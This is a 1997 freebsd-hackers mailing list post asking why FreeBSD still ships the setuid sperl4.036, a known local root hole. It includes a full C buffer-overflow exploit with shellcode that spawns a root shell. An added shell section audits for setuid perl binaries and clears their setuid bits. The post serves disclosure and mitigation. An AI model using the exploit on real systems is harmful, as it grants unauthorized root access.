Date:      Mon, 15 Sep 1997 06:30:43 +0200 (CEST)
From:      Existence is Futile <nonxstnt@not.of.this.world.engelska.se>
To:        freebsd-hackers@FreeBSD.org
Subject:   Why SPERL? 
Message-ID:  <Pine.BSF.3.96.970915062637.22299A-100000@krusty.the.clown.engelska.se>

Someone posted a similar message earlier, but I never saw a reply (might
have been because the mailserver for this domain is Linux.. hehe). But I
just want to bring it to your attention again.

Why does even the latest RELENG (that I've used) include sperl4.036, when
it's a well known way to get root? It came in handy today when some guy
couldn't su because he wasn't in the wheel group and couldn't log in as root
any other way (being 45 minutes away). But it's a serious security flaw!

Perhaps we shouldn't include sperl4.036, or turn its suid off. I'm not
sure if 4.0 is still being maintained, so I don't know if there is a newer
version available, but I don't believe it acceptable to purposely leave
root holes in.

Of course, this may have already been fixed and I'm just blowing hot air
all around, but it's an old exploit and the August RELENGs at least
include it.

/************************************************************/
/*   Exploit for FreeBSD sperl4.036 by OVX                  */
/************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memset, memcpy, strlen (include was missing) */
#include <unistd.h>

#define BUFFER_SIZE     1400
#define OFFSET          600

/* Returns the current stack pointer: the value is left in %eax, which is
   the i386 return register, so no explicit return statement is used. */
char *get_esp(void) {
        asm("movl %esp,%eax");
}

char buf[BUFFER_SIZE];

int main(int argc, char *argv[])
{
    int i;
    char execshell[] =
                       "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
                       "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
                       "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
                       "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

    /* Fill the buffer with the guessed stack address. */
    for(i=0+1;i<BUFFER_SIZE-4;i+=4)
       *(char **)&buf[i] = get_esp() - OFFSET;

    /* NOP sled, then the shellcode. */
    memset(buf,0x90,768+1);
    memcpy(&buf[768+1],execshell,strlen(execshell));

    buf[BUFFER_SIZE-1]=0;

    /* Hand the oversized argument to the setuid interpreter. */
    execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
    return 0;
}


--
thomas stromberg . system admin @ Royal Institute of Technology, Stockholm
nobody@darkening.com (nobody@EFnet), talk:nobody@krusty.the.clown.engelska.se
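The mitigation the post suggests (turn the suid bit off) is something an administrator can audit for and apply across a system. The following shell functions are an added example, not part of the original message or the FreeBSD tree: they locate setuid regular files whose names match the setuid perl naming (`sperl*`, `suidperl*`) under the given directories, report them, and optionally clear the setuid/setgid bits. The name patterns and directory arguments are assumptions; adjust them for the installation being checked.

```shell
#!/bin/sh
# Audit for setuid perl interpreters (sperl*, suidperl*) under the given roots.
# Usage: audit_setuid_perl /usr/bin /usr/local/bin
audit_setuid_perl() {
    for root in "$@"; do
        [ -d "$root" ] || continue
        # -perm -4000 matches any file with the setuid bit set;
        # the name patterns are an assumption covering common sperl builds.
        find "$root" -type f -perm -4000 \
            \( -name 'sperl*' -o -name 'suidperl*' \) -print 2>/dev/null
    done
}

# Succeeds (exit 0) only when no setuid perl binary was found.
check_no_setuid_perl() {
    found=$(audit_setuid_perl "$@" | wc -l | tr -d ' ')
    [ "$found" -eq 0 ]
}

# Apply the "turn its suid off" mitigation: clear setuid and setgid on each hit.
strip_setuid_perl() {
    audit_setuid_perl "$@" | while IFS= read -r f; do
        chmod u-s,g-s "$f" && printf 'cleared setuid on %s\n' "$f"
    done
}
```

Run `audit_setuid_perl` first to see what would be changed; `strip_setuid_perl` needs write permission on the binaries, so it is normally run as root.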